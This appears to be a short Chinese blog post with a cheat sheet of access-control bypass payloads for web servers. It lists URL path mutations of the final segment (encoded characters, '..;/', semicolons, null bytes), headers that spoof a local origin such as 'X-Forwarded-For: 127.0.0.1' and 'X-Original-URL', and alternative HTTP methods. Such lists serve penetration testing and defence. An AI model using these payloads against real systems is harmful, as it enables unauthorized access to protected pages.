前言:今年在忙其他事情,博客随缘更新。
URLBypass
Lastpath为最后一个"/"之后的uri,例如"https://test.com/test/admin"中的Lastpath为"admin"
- "%2e/"+Lastpath
- Lastpath+"/."
- "./"+Lastpath+"/./"
- Lastpath+"%20"
- Lastpath+"%20/"
- Lastpath+"%09"
- Lastpath+"%09/"
- Lastpath+"%00"
- Lastpath+"%00/"
- "%20"+Lastpath+"%20/"
- Lastpath+"..;/"
- Lastpath+"/..;/"
- Lastpath+"?"
- Lastpath+"??"
- Lastpath+"???"
- "/"+Lastpath+"//"
- Lastpath+"/"
- Lastpath+".randomstring"
- Lastpath+"/*"
- Lastpath+"/*/"
- Lastpath+"/%2f/"
- Lastpath+"%0d%0a
- "%3b"+Lastpath
- ";/"+Lastpath
- "/"+Lastpath
- Lastpath+#
- Lastpath+"/%3b/"
HttpHeaderBypass
- X-Custom-IP-Authorization: 127.0.0.1
- X-Forwarded-For: 127.0.0.1
- X-Forward-For: 127.0.0.1
- Y-Forward-For: 127.0.0.1
- X-Remote-IP: 127.0.0.1
- X-Originating-IP: 127.0.0.1
- X-Remote-Addr: 127.0.0.1
- X-Client-IP: 127.0.0.1
- X-Real-IP: 127.0.0.1
- X-Rewrite-URL: +OriginalUrl
- X-Original-URL: + OriginalUrl
- Referer: /+Lastpath
- X-Host: 127.0.0.1
- X-Forwarded-Host: 127.0.0.1
修改请求方式
https://www.bbsmax.com/A/1O5EMGZy57/
GET、POST、HEAD、PUT、TRACK、TRACE、DELETE